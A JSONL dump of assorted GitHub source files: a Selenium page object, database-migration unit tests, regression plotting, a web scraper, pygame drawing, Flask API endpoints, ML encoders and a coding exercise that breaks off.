self.find_element(self.__locators.TERMIN_CONDIC_INP).click()\n self.find_element(self.__locators.ACEPTAR_BTN).click()\n try:\n self.find_element(self.__locators.ACEPTAR_ADV_BTN).click()\n except TimeoutException:\n pass\n\n","repo_name":"Valupiruiz/AutomationPHP","sub_path":"CDocente/page_objects/certificados/certificado.py","file_name":"certificado.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"3856953811","text":"from subprocess import Popen, PIPE\nimport unittest\nfrom nose.tools import *\n\nfrom dbsync import *\n\n\nclass ParseMigrationCode(unittest.TestCase):\n\n def test_up_and_down_annotations(self):\n migration = parse_migration_code('''\n -- @UP\n CREATE TABLE users\n -- @DOWN\n DROP TABLE users\n ''')\n assert_equals({'up': 'CREATE TABLE users', 'down': 'DROP TABLE users'}, migration)\n\n def test_one_annotation_missing(self):\n migration = parse_migration_code('''\n -- @UP\n CREATE TABLE users\n ''')\n assert_equals({'up': 'CREATE TABLE users', 'down': None}, migration, \n 'Missing @DOWN')\n\n migration = parse_migration_code('''\n -- @DOWN\n DROP TABLE users\n ''')\n assert_equals({'up': None, 'down': 'DROP TABLE users'}, migration, \n 'Missing @UP')\n\n def test_no_annotations(self):\n assert_equals({'up': None, 'down': None}, parse_migration_code(''))\n\n def test_annotation_like_literals_in_sql_statements(self):\n migration = parse_migration_code('''\n -- @UP\n INSERT INTO users VALUES (NULL, \"-- @DOWN\")\n -- @DOWN\n DELETE FROM users\n ''')\n expected = {\n 'up': 'INSERT INTO users VALUES (NULL, \"-- @DOWN\")',\n 'down': 'DELETE FROM users'\n }\n assert_equals(expected, migration)\n\n\nclass ExtractVersionFromName(unittest.TestCase):\n\n def test_extracts_version_from_filename(self):\n assert_equals(20130307005200, extract_version_from_name('20130307005200_foo.sql'))\n\n def test_extracts_version_from_filepath(self):\n assert_equals(\n 20130307005200, \n extract_version_from_name('path/to/20130307005200_foo.sql'))\n\n\nclass SelectApplicableChanges(unittest.TestCase):\n\n def test_no_target_version_no_schema_version(self):\n \"\"\"Selects all up changes\"\"\"\n migrations = [\n {'version': 1, 'up': 'UP 1', 'down': 'DOWN 1'},\n {'version': 2, 'up': 'UP 2', 'down': 'DOWN 2'},\n {'version': 3, 'up': 'UP 3', 'down': 'DOWN 3'},\n ]\n expected = [\n (1, 'UP 1'), (2, 'UP 2'), (3, 'UP 3')\n ]\n assert_equals(expected, select_applicable_changes(migrations))\n\n def test_no_target_version_but_preset_schema_version(self):\n \"\"\"Selects all up changes above schema version\"\"\"\n migrations = [\n {'version': 1, 'up': 'UP 1', 'down': 'DOWN 1'},\n {'version': 2, 'up': 'UP 2', 'down': 'DOWN 2'},\n {'version': 3, 'up': 'UP 3', 'down': 'DOWN 3'},\n ]\n expected = [\n (3, 'UP 3')\n ]\n assert_equals(\n expected, \n select_applicable_changes(migrations, schema_version=2))\n\n def test_target_version_above_schema_version(self):\n \"\"\"Selects up changes above schema version upto and including target\"\"\"\n migrations = [\n {'version': 1, 'up': 'UP 1', 'down': 'DOWN 1'},\n {'version': 2, 'up': 'UP 2', 'down': 'DOWN 2'},\n {'version': 3, 'up': 'UP 3', 'down': 'DOWN 3'},\n ]\n expected = [\n (2, 'UP 2'), (3, 'UP 3')\n ]\n assert_equals(\n expected, \n select_applicable_changes(migrations, schema_version=1, target_version=3))\n\n def test_target_version_below_schema_version(self):\n \"\"\"Selects down changes from below schema version downto but not including target\"\"\"\n migrations = [\n {'version': 1, 'up': 'UP 1', 'down': 'DOWN 1'},\n {'version': 2, 'up': 'UP 2', 'down': 'DOWN 2'},\n {'version': 3, 'up': 'UP 3', 'down': 'DOWN 3'},\n ]\n expected = [\n (3, 'DOWN 3'), (2, 'DOWN 2')\n ]\n assert_equals(\n expected, \n select_applicable_changes(migrations, schema_version=3, target_version=1))\n\n def test_target_version_equal_schema_version(self):\n \"\"\"Selects nothing\"\"\"\n migrations = [\n {'version': 1, 'up': 'UP 1', 'down': 'DOWN 1'},\n {'version': 2, 'up': 'UP 2', 'down': 'DOWN 2'},\n {'version': 3, 'up': 'UP 3', 'down': 'DOWN 3'},\n ]\n assert_equals(\n [],\n select_applicable_changes(migrations, schema_version=3, target_version=3))\n\n\nclass _TestWithDatabase(unittest.TestCase):\n\n def setUp(self):\n self.db = 'sqlite3 -bail tests/test.db'\n\n def tearDown(self):\n if os.path.exists('tests/test.db'): os.remove('tests/test.db')\n\n\nclass ExecuteDatabaseCommand(_TestWithDatabase):\n\n def setUp(self):\n super(ExecuteDatabaseCommand, self).setUp()\n p = Popen(self.db, stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=True)\n p.communicate('''\n CREATE TABLE schema_version (version INTEGER NOT NULL);\n INSERT INTO schema_version VALUES (20130307005200);\n ''')\n\n def test_executes_command(self):\n result = execute_db_command(self.db, 'SELECT version FROM schema_version;')\n assert_equals('20130307005200\\n', result)\n\n @raises(DbSyncError)\n def test_raises_error_when_command_cannot_be_executed(self):\n execute_db_command(self.db, 'FUCKED')\n\n\n# Pending\n# class ExecuteChange(_TestWithDatabase):\n\n# def test_executes_change_sql_and_updates_schema_version(self):\n# execute_change(self.db, (20130307005200, 'CREATE TABLE foo (id INTEGER NOT NULL);'))\n# execute_db_command(self.db, 'SELECT id FROM foo;')\n","repo_name":"mzb/dbsync","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"17522861115","text":"\n# Import Libraries\nimport numpy as np\nimport matplotlib.pylab as pyplot\nimport pandas as pd\n\nfrom main.python.MachineLearning.TimeSeriesForecasting.DataCollection import collectAndWriteToCsv\n\nfrom sklearn.model_selection import TimeSeriesSplit\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\n\n\n# Setup\nmarket_name = \"ETH-LTC\"\ntrade_period = \"day\"\nfile_name = \"MarketData.csv\"\nwindow_size = 10\nprint(\"Recent closing prices for {} exchange\".format(market_name))\ncollectAndWriteToCsv(market_name, trade_period, file_name)\n\n\n# Import the dataset\nseries = pd.read_csv(file_name)\nx_data = series.index.values.reshape(-1, 1)\ny_data = series[\"ClosingPrice\"].values\n\n\n# Splitting the data into the Training and Test sets\nnum_splits = 2\nsplits = TimeSeriesSplit(n_splits=num_splits)\n\nindex = 1\nfor train_index, test_index in splits.split(x_data):\n x_train, x_test = x_data[train_index], x_data[test_index]\n y_train, y_test = y_data[train_index], y_data[test_index]\n\n # Fitting the Linear Regressor\n linear_regressor = LinearRegression()\n linear_regressor.fit(x_train, y_train)\n\n # Fitting the Polynomial Regressor\n linear_regressor_2 = LinearRegression()\n poly_regressor = PolynomialFeatures(degree=10)\n x_poly = poly_regressor.fit_transform(x_train)\n poly_regressor.fit(x_poly, y_train)\n linear_regressor_2.fit(x_poly, y_train)\n\n pyplot.figure(index)\n pyplot.subplot(411)\n pyplot.plot(x_train, y_train, color=\"red\", label=\"Original\")\n pyplot.plot(x_train, linear_regressor.predict(x_train), color=\"blue\", label=\"Prediction\")\n pyplot.legend(loc=\"best\")\n pyplot.title(\"Training data linear regression index - {}\".format(index))\n\n pyplot.figure(index)\n pyplot.subplot(412)\n pyplot.plot(x_test, y_test, color=\"red\", label=\"Original\")\n pyplot.plot(x_test, linear_regressor.predict(x_test), color=\"blue\", label=\"Prediction\")\n pyplot.legend(loc=\"best\")\n pyplot.title(\"Test data linear regression index - {}\".format(index))\n\n pyplot.figure(index)\n pyplot.subplot(413)\n pyplot.plot(x_train, y_train, color=\"red\", label=\"Original\")\n pyplot.plot(x_train, linear_regressor_2.predict(poly_regressor.fit_transform(x_train)), color=\"blue\", label=\"Prediction\")\n pyplot.legend(loc=\"best\")\n pyplot.title(\"Training data poly regression index - {}\".format(index))\n\n pyplot.figure(index)\n pyplot.subplot(414)\n pyplot.plot(x_test, y_test, color=\"red\", label=\"Original\")\n pyplot.plot(x_test, linear_regressor_2.predict(poly_regressor.fit_transform(x_test)), color=\"blue\", label=\"Prediction\")\n pyplot.legend(loc=\"best\")\n pyplot.title(\"Test data poly regression index - {}\".format(index))\n\n index += 1\n\npyplot.show()","repo_name":"sadothcoder/PythonCryptoTrader","sub_path":"main/python/MachineLearning/TimeSeriesForecasting/Udemy/PolynomialRegression.py","file_name":"PolynomialRegression.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"36516520718","text":"import requests\r\nfrom fake_useragent import UserAgent\r\nfrom lxml import etree\r\n\r\nurl = 'http://www.farmer.com.cn/xwpd/rdjj1/201807/t20180726_1393916.htm'\r\nheaders = {\r\n \"User-Agent\": UserAgent().random\r\n}\r\n\r\nresponse = requests.get(url, headers=headers)\r\ne = etree.HTML(response.text) # xpath解析\r\n\r\ntitle = e.xpath('//h1/text()') # 文章标题\r\n\r\ncontent = e.xpath('//div[@class=\"content\"]//p') # 文章内容\r\n# content优化格式\r\ncontent_list = []\r\nfor c in content:\r\n info = c.xpath('string(.)') # 格式化当前节点\r\n content_list.append(info)\r\ncontent_str = ''.join(content_list) # 字符串化\r\n\r\nimg_urls = e.xpath('//div[@class=\"content\"]//img/@src') # 图片链接\r\n\r\nimg_names = e.xpath('//div[@align=\"center\"]') # 图片标题\r\nfor num in range(1, len(img_names), 2):\r\n img_name = img_names[num].xpath('string(.)')\r\n","repo_name":"Wangzg97/crawler_learning","sub_path":"31-练习-图文抓取.py","file_name":"31-练习-图文抓取.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"11327083815","text":"\nprint(\"App`i dayandirmaq ucun : exit yazin\")\nwhile True:\n con=open('Python_Tasks/File/python.txt','a')\n a= input(\"Melumat elave edin:\")\n if a==\"exit\":\n break\n con.close()\n else:\n con.write(a)\n con.write(\"\\n\")\n con.close()\n","repo_name":"feritkerimli/PragmatechFoundationProject","sub_path":"Python_Tasks/File/writefile.py","file_name":"writefile.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"8"} +{"seq_id":"23774380863","text":"\"\"\"\njustwindow.py:\n window を表示するスクリプト\n 色を変えたりイベントを学ぶ\n\"\"\"\n# window を表示する\nimport sys\nimport pygame\nfrom pygame.locals import QUIT\n\n# pygame モジュールの初期化\npygame.init()\n\n# 400*300サイズのウィンドウを作成して定数SURFACEに格納\nSURFACE = pygame.display.set_mode((400, 300))\n# 実行時間の調整\nFPSCLOCK = pygame.time.Clock()\n\ndef main():\n \"\"\" main routine \"\"\"\n\n while True:\n\n # \"event\"とはマウスを動かしたりクリックしたりの動作\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n # 画面をオレンジ色で塗りつぶす\n SURFACE.fill((255, 150, 0))\n\n # 格子を作る\n # 黒:縦線\n for x_position in range(0,400,25):\n pygame.draw.line(SURFACE, (0,0,0),\n (x_position, 0), (x_position, 300))\n # 黒:横線\n for y_position in range(0,300,25):\n pygame.draw.line(SURFACE, (0,0,0),\n (0, y_position), (400, y_position))\n\n pygame.display.update()\n FPSCLOCK.tick(3)\n\n \nif __name__ == '__main__':\n main()","repo_name":"sayaka71/Python","sub_path":"Pygame/draw_line1.py","file_name":"draw_line1.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"321785332","text":"from src.engine.configurations import EngineConfigurations\nfrom src.engine.cnn import ConvolutionalNeuralNetwork\nfrom src.engine.fcn import FullyConvolutionalNetwork\nfrom src.engine.gan import GenerativeAdversairalNetwork\nfrom src.engine.bbd import BoundingBoxDetector\n\n\nclass Dlae(object):\n def __init__(self, configs):\n self.configs = configs\n self.engine_configs = EngineConfigurations(self.configs)\n self.model = None\n self.errors = []\n self.get_model()\n\n def get_model(self):\n if self.engine_configs.dispatcher.model_signal == \"CNN\":\n self.model = ConvolutionalNeuralNetwork(self.engine_configs)\n\n elif self.engine_configs.dispatcher.model_signal == \"FCN\":\n self.model = FullyConvolutionalNetwork(self.engine_configs)\n\n elif self.engine_configs.dispatcher.model_signal == \"GAN\":\n self.model = GenerativeAdversairalNetwork(self.engine_configs)\n\n elif self.engine_configs.dispatcher.model_signal == \"BBD\":\n self.model = BoundingBoxDetector(self.engine_configs)\n\n def run(self):\n if self.engine_configs.dispatcher.type_signal == \"Train\":\n self.model.construct_graph()\n if any(self.model.errors):\n [self.errors.append(error) for error in self.model.errors]\n else:\n self.model.compile_graph()\n if any(self.model.errors):\n [self.errors.append(error) for error in self.model.errors]\n else:\n self.model.train_graph()\n if any(self.model.errors):\n [self.errors.append(error) for error in self.model.errors]\n\n elif self.engine_configs.dispatcher.type_signal == \"Train from Checkpoint\":\n self.model.retrain_graph()\n if any(self.model.errors):\n [self.errors.append(error) for error in self.model.errors]\n\n elif self.engine_configs.dispatcher.type_signal == \"Inference\":\n self.model.predict_on_graph()\n if any(self.model.errors):\n [self.errors.append(error) for error in self.model.errors]\n","repo_name":"jeremiahws/dlae","sub_path":"src/engine/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"8"} +{"seq_id":"11542894282","text":"\"\"\"\nbehavior for factory\n--------------------\n\n >>> from memphis import config, content\n >>> config.begin(packages=('memphis.content.meta',))\n\n >>> from zope import interface\n >>> from zope.component import getSiteManager\n >>> class Ob(object):\n ... def __init__(self, iface):\n ... interface.directlyProvides(self, iface)\n\n >>> class ITest(interface.Interface):\n ... pass\n\n >>> class TestFactory(content.BehaviorFactoryBase):\n ... content.behavior('test', ITest)\n\n >>> class TestFactory2(content.BehaviorFactoryBase):\n ... pass\n ...\n >>> reGrok()\n\n >>> sm = getSiteManager()\n >>> print content.queryBehavior(ITest)\n None\n\n >>> config.commit()\n\n >>> bh = content.getBehavior(ITest)\n >>> isinstance(bh.factory, TestFactory)\n True\n\n >>> config.begin()\n >>> class TestFactory3(content.BehaviorFactoryBase):\n ... content.behavior('test', ITest)\n\n >>> reGrok()\n >>> config.commit()\n Traceback (most recent call last):\n ...\n ConfigurationConflictError: Conflicting configuration actions\n ...\n\n\"\"\"\nimport martian, sys\nfrom zope import interface\nfrom zope.interface.interface import InterfaceClass\n\nfrom memphis import config\nfrom memphis.content import registry, interfaces\nfrom memphis.content.directives import schema, behavior\nfrom memphis.content.registry import BehaviorBase, BehaviorFactoryBase\n\n\nclass SchemaGrokker(martian.InstanceGrokker):\n martian.component(InterfaceClass)\n martian.directive(schema)\n\n def grok(self, name, interface, configContext=config.UNSET, **kw):\n if interface in schemaExecuted and \\\n not getattr(interface.__module__, '__fake_module__', False):\n return False\n schemaExecuted.append(interface)\n\n value = schema.bind(default=_marker).get(interface)\n if value is _marker:\n return False\n\n name, klass, type, t, d, info = value\n\n config.addAction(\n configContext,\n discriminator = ('memphis.content:schema', name),\n callable = registry.registerSchema,\n args = (name, interface, klass, type, t, d),\n order = (config.moduleNum(interface.__module__), 90),\n info = info)\n return True\n\n\nclass BehaviorGrokker(martian.ClassGrokker):\n martian.component(BehaviorBase)\n martian.directive(behavior)\n\n def execute(self, klass, configContext=None, **kw):\n value = behavior.bind(default=_marker).get(klass)\n if value is _marker:\n return False\n\n name, iface, schema, type, t, d, info = value\n\n if iface is None:\n provides = list(interface.implementedBy(klass))\n if len(provides) == 1:\n iface = provides[0]\n else:\n raise TypeError(\"Missing 'spec' attribute\")\n\n config.addAction(\n configContext,\n discriminator = ('memphis.content:behavior', name),\n callable=registry.registerBehavior,\n args = (name, iface, klass, schema, type, t, d),\n order = (config.moduleNum(klass.__module__), 91),\n info = info)\n\n return True\n\n\nclass BehaviorFactoryGrokker(martian.ClassGrokker):\n martian.component(BehaviorFactoryBase)\n martian.directive(behavior)\n\n def execute(self, factory, configContext=None, **kw):\n value = behavior.bind(default=_marker).get(factory)\n if value is _marker:\n return False\n\n name, iface, schema, type, t, d, info = value\n\n config.addAction(\n configContext,\n discriminator = ('memphis.content:behavior', name),\n callable=registry.registerBehavior,\n args = (name, iface, factory(), schema, type, t, d),\n order = (config.moduleNum(factory.__module__), 91),\n info = info)\n\n return True\n\n\n_marker = object()\n\nschemaExecuted = []\n\n@config.cleanup\ndef cleanUp():\n global schemaExecuted\n schemaExecuted[:] = []\n","repo_name":"fafhrd91/memphis-dev","sub_path":"plone/memphis.content/memphis/content/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"3924109668","text":"# 文中のすべての名詞を含む文節に対し,その文節から構文木の根に至るパスを抽出せよ.\n# ただし,構文木上のパスは以下の仕様を満たすものとする.\n# 各文節は(表層形の)形態素列で表現する\n# パスの開始文節から終了文節に至るまで,各文節の表現を\"->\"���連結する\nimport re\n\nclass Morph:\n def __init__(self,surface,bace,pos,pos1):\n self.surface = surface\n self.bace = bace\n self.pos = pos\n self.pos1 = pos1\n # それぞれの要素を返すメソッド(関数)\n def __str__(self):\n return \"surface[{}] bace[{}] pos[{}] pos1[{}]\".format(self.surface,self.bace,self.pos,self.pos1)\n\nclass Chunk:\n def __init__(self):\n self.morphs = []\n self.dst = None\n self.srcs = None\n\n def __str__(self):\n surface = \"\"\n for morph in self.morphs:\n surface += morph.surface\n return \"{} dst[{}] srcs[{}]\".format(surface,self.dst,self.srcs)\n\n def sentence_surface(self):\n surface = \"\"\n for morph in self.morphs:\n if morph.pos != \"記号\":\n surface += morph.surface\n return surface\n\n def sentence_pos(self,pos):\n for morph in self.morphs:\n if morph.pos == pos:\n return True\n return False\n\ndef chunk_list():\n ans = []\n mid = []\n chunk = Chunk()\n\n with open(\"neko.txt.cabocha\") as data:\n lines = data.readlines()\n for line in lines:\n if line[:3] == \"EOS\":\n \n if len(chunk.morphs) > 0:\n mid.append(chunk)\n chunk = Chunk()\n \n if len(mid) > 0:\n ans.append(mid)\n mid = []\n else:\n if line[0] == \"*\":\n if len(chunk.morphs) > 0:\n mid.append(chunk)\n chunk = Chunk()\n parts = line.split(\" \")\n parts[2] = int(re.sub(\"D\",\"\",parts[2]))\n chunk.dst = parts[2]\n chunk.srcs = parts[1]\n else:\n words = line.split(\"\\t\")\n parts = words[1].split(\",\")\n morph = Morph(words[0],parts[6],parts[0],parts[1])\n chunk.morphs.append(morph)\n return ans\n\nif __name__ == \"__main__\":\n answers = chunk_list()\n for chunks in answers:\n for chunk in chunks:\n if chunk.sentence_pos(\"名詞\"):\n word = chunk\n while word.dst != -1:\n src = word.sentence_surface()\n word = chunks[word.dst]\n if src != \"\":\n print(f\"{src}->\",end = \"\")\n end = word.sentence_surface()\n if end != chunk.sentence_surface():\n print(end)\n","repo_name":"a1da4/NLP_100-knocks_2015","sub_path":"chap5/48_100.py","file_name":"48_100.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"36572443127","text":"\nimport json\nimport requests\nfrom settings import *\nfrom _secret import *\n\nHOOK_URL = INCOMING_HOOK_URL\n\nclass Bot(object):\n \"\"\"An abstract bot API wrapper for slack.\n \"\"\"\n def __init__(self, channel=DEFAULT_CHANNEL, username=DEFAULT_USERNAME, emoji=':ai:'):\n self.payload = {'channel': channel, 'username': username, 'emoji': emoji}\n\n def send(self, *texts, **kwargs):\n \"\"\"Sends a message via incoming hook in `print` semantic of python.\"\"\"\n payload = self.payload.copy()\n if 'channel' in kwargs:\n payload['channel'] = kwargs['channel']\n if 'username' in kwargs:\n payload['username'] = kwargs['username']\n payload['text'] = ' '.join(map(unicode, texts))\n return requests.post(HOOK_URL, data={'payload': json.dumps(payload)})\n\n","repo_name":"youknowone/ingress-slack","sub_path":"botkit.py","file_name":"botkit.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"8"} +{"seq_id":"11479165489","text":"from flask import Response\nfrom flask_restful import Resource\nfrom models import LikePost, db, Post\nimport json\nfrom . import can_view_post, get_authorized_user_ids\nimport flask_jwt_extended\n\nclass PostLikesListEndpoint(Resource):\n\n @flask_jwt_extended.jwt_required()\n def __init__(self, current_user):\n self.current_user = current_user\n \n @flask_jwt_extended.jwt_required()\n def post(self, post_id):\n # Your code here\n try:\n user_id = self.current_user.id # id of the user who is logged in\n \n # create post:\n\n post = Post.query.get(post_id)\n if not post:\n return Response(json.dumps({'message': 'Invalid post ID'}), mimetype=\"application/json\", status=404)\n\n ids_for_me_and_my_friends = get_authorized_user_ids(self.current_user)\n if can_view_post(post_id, self.current_user):\n\n newLike = LikePost(user_id, post_id)\n \n try:\n db.session.add(newLike)\n db.session.commit()\n return Response(json.dumps(newLike.to_dict()), mimetype=\"application/json\", status=201)\n\n\n except:\n return Response(json.dumps({'message': 'Like already exists'}), mimetype=\"application/json\", status=400)\n else:\n return Response(json.dumps({'message': 'You do not have access to this post'}), mimetype=\"application/json\", status=404)\n \n \n except Exception as e:\n print(\"error in post likes\", e)\n return Response(json.dumps({'message': 'Invalid query'}), mimetype=\"application/json\", status=400)\n \n \n\nclass PostLikesDetailEndpoint(Resource):\n\n @flask_jwt_extended.jwt_required()\n def __init__(self, current_user):\n self.current_user = current_user\n \n @flask_jwt_extended.jwt_required()\n def delete(self, post_id, id):\n\n try:\n comment = LikePost.query.get(id)\n\n if not comment:\n return Response(json.dumps({'message': 'Error comment with that ID does not exist'}), mimetype=\"application/json\", status=404)\n \n if comment.user_id != self.current_user.id:\n return Response(json.dumps({'message': 'Error you do not have access to this'}), mimetype=\"application/json\", status=404)\n \n if comment:\n \n LikePost.query.filter_by(id=id).delete()\n db.session.commit()\n serialized_data = {\n 'message': 'Like {0} successfully deleted.'.format(id)\n }\n return Response(json.dumps(serialized_data), mimetype=\"application/json\", status=200)\n\n else:\n return Response(json.dumps({'message': 'Error comment with that ID does not exist'}), mimetype=\"application/json\", status=404)\n\n except:\n return Response(json.dumps({'message': 'Invalid query'}), mimetype=\"application/json\", status=400)\n \n # Your code here\n \n\n\n\ndef initialize_routes(api):\n api.add_resource(\n PostLikesListEndpoint, \n '/api/posts//likes', \n '/api/posts//likes/', \n resource_class_kwargs={'current_user': flask_jwt_extended.current_user}\n )\n\n api.add_resource(\n PostLikesDetailEndpoint, \n '/api/posts//likes/', \n '/api/posts//likes//',\n resource_class_kwargs={'current_user': flask_jwt_extended.current_user}\n )\n","repo_name":"notfingees/photo-app-2","sub_path":"views/post_likes.py","file_name":"post_likes.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"10506512597","text":"\"\"\"Median price null\n\nRevision ID: 9b4286219299\nRevises: 1a59ce76e17d\nCreate Date: 2022-02-17 14:44:52.887249\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '9b4286219299'\ndown_revision = '1a59ce76e17d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('dota_item_history', 'median_price',\n existing_type=sa.NUMERIC(precision=10, scale=2),\n nullable=True)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('dota_item_history', 'median_price',\n existing_type=sa.NUMERIC(precision=10, scale=2),\n nullable=False)\n # ### end Alembic commands ###\n","repo_name":"NeKadgar/game_market_steam_eye","sub_path":"alembic/versions/9b4286219299_median_price_null.py","file_name":"9b4286219299_median_price_null.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"22510489736","text":"# Importing Dependencies\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn import set_config\n\nimport pandas as pd\nimport numpy as np\nimport warnings\n\n# Ignoring potential warnings\nwarnings.filterwarnings(action = \"ignore\")\n\n# Visualizing the pipeline\nset_config(display = \"diagram\")\n\n# Defining a global level seed\nnp.random.seed(seed = 42)\n\n# Creating a custom FrequencyRatioEncoder class\nclass FrequencyRatioEncoder(BaseEstimator, TransformerMixin):\n # Initializing the objects\n def __init__(self, use_arbitrary_frequency_ratio = False, unknown_value_frequency_ratio = None):\n self.use_arbitrary_frequency_ratio = use_arbitrary_frequency_ratio\n self.unknown_value_frequency_ratio = unknown_value_frequency_ratio\n \n # Defining the fit function\n def fit(self, X, y = None):\n # Creating an empty list to store frequency ratios\n frequencies = []\n \n # Creating a copy of a data frame\n data_frame = X.copy()\n \n # Creating a list of columns\n columns = data_frame.columns.tolist()\n \n # Looping through each column\n for i in columns:\n # Calculating the frequency ratio of each unique value of a variable\n frequency_dict = data_frame[i].value_counts(normalize = True).to_dict()\n \n # Appending the dictionary to the list\n frequencies.append(frequency_dict)\n \n # Redefining the objects\n self.frequencies = frequencies\n self.columns = columns\n \n # Returning the objects\n return self\n \n # Defining the transform function\n def transform(self, X, y = None):\n # Creating a copy of a data frame\n data_frame = X.copy()\n \n # Reseting the index\n data_frame.reset_index(drop = True, inplace = True)\n \n # Looping through each column\n for index, column in enumerate(iterable = self.columns):\n # Replacing the unique values with a frequency ratio\n data_frame[column] = data_frame[column].apply(func = lambda x: self.frequencies[index].get(x))\n \n # Creating a condition based on unseen value in a dataset\n if data_frame[column].isna().sum() > 0:\n # Creating a condition based on arbitrary frequency ratio\n if not self.use_arbitrary_frequency_ratio:\n # Calculating the penalized frequency ratio\n frequency_ratio = min(list(self.frequencies[index].values())) / 2\n \n # Replacing the unseen value with the penalized frequency ratio\n data_frame.loc[data_frame[column].isna(), column] = frequency_ratio\n else:\n # Replacing the unseen value with the unknown value frequency ratio\n data_frame.loc[data_frame[column].isna(), column] = self.unknown_value_frequency_ratio\n else:\n # Passing in case the condition is not satisfied\n pass\n \n # Asserting the number of mising values to be equal to zero\n assert data_frame[column].isna().sum() == 0\n \n # Returning the data frame\n return data_frame\n\n# Defining a custom class to encode rare categories\nclass RareLabelEncoder(BaseEstimator, TransformerMixin):\n # Defining the instance attributes\n def __init__(self, tol = 0.1, n_categories = 10, new_category = \"Other\", unseen_category = \"Unseen Category\"):\n self.tol = tol\n self.n_categories = n_categories\n self.new_category = new_category\n self.unseen_category = unseen_category\n\n # Defining the fit function\n def fit(self, X, y = None):\n # Creating a copy of a data frame\n data_frame = X.copy()\n\n # Creating a list of columns\n columns = data_frame.columns.tolist()\n\n # Creating a list of features with high cardinality\n high_cardinality_features = [i for i in columns if data_frame[i].nunique() >= self.n_categories]\n\n # Creating a list of value frequency for each feature\n category_frequencies = [data_frame[i].value_counts(normalize = True) for i in high_cardinality_features]\n\n # Creating a list of rare categories for each feature\n rare_categories = [i.loc[i < self.tol].index.tolist() for i in category_frequencies]\n\n # Looping through each loop\n for index, column in enumerate(iterable = high_cardinality_features):\n # Mapping the rare categories\n data_frame.loc[data_frame[column].isin(values = rare_categories[index]), column] = f\"{self.new_category}_{column}\"\n\n # Creating a list of unique categories\n unique_categories_train = [data_frame[i].unique().tolist() for i in high_cardinality_features]\n\n # Redefining the instance attributes\n self.high_cardinality_features = high_cardinality_features\n self.unique_categories_train = unique_categories_train\n self.rare_categories = rare_categories\n\n # Returning the objects\n return self\n\n # Defining the fit function\n def transform(self, X, y = None):\n # Creating a copy of a data frame\n data_frame = X.copy()\n\n # Looping through each loop\n for index, column in enumerate(iterable = self.high_cardinality_features):\n # Creating a list of rare categories\n rare_categories = self.rare_categories[index]\n\n # Creating a list of unique values of a train set\n unique_categories_train = self.unique_categories_train[index]\n\n # Mapping the rare categories\n data_frame.loc[data_frame[column].isin(values = rare_categories), column] = f\"{self.new_category}_{column}\"\n\n # Creating a list of unique values of a test set\n unique_categories_test = data_frame[column].unique().tolist()\n\n # Identifying the potential unseen categories\n unseen_categories = [i for i in unique_categories_test if i not in unique_categories_train]\n\n # Creating a condition based on the number of unseen categories\n if len(unseen_categories) > 0:\n # Mapping the unseen categories\n data_frame.loc[data_frame[column].isin(values = unseen_categories), column] = self.unseen_category\n else:\n # Passing in case the condition is not satisfied\n pass\n\n # Returning the data frame\n return data_frame","repo_name":"Theynalzada/turbo_car","sub_path":"Notebooks/turbo_category_encoders.py","file_name":"turbo_category_encoders.py","file_ext":"py","file_size_in_byte":6547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"2701496428","text":"def solution(phone_book):\n phone_book = sorted(phone_book, key=lambda x: (len(x), int(x)), reverse=False)\n print(phone_book)\n for i in range(len(phone_book)):\n print('\\n{}가 접두어로 포함된 번호가 있는지 확인합니다.'.format(phone_book[i]))\n for j in range(i+1, len(phone_book)):\n print(phone_book[j])\n if len(phone_book[i]) == len(phone_book[j]):\n pass\n else:\n if len(phone_book[i]) < len(phone_book[j]):\n print('{}에 {}가 접두어로 있는지 확인합니다.'.format(phone_book[j], phone_book[i]))\n if phone_book[i] == phone_book[j][:len(phone_book[i])]:\n print('{}에 {}가 있습니다.'.format(phone_book[j], phone_book[i]))\n return False\n return True\n\nprint(solution([\"119\", \"97674223\", \"1195524421\"]))\nprint(solution([\"123\",\"456\",\"789\"]))\nprint(solution([\"12\",\"123\",\"1235\",\"567\",\"88\",'11']))\n\ndef solution2(phone_book):\n len_pb = list(set([len(element) for element in phone_book]))\n len_pb.sort(reverse=False)\n # phone_book 리스트의 원소들의 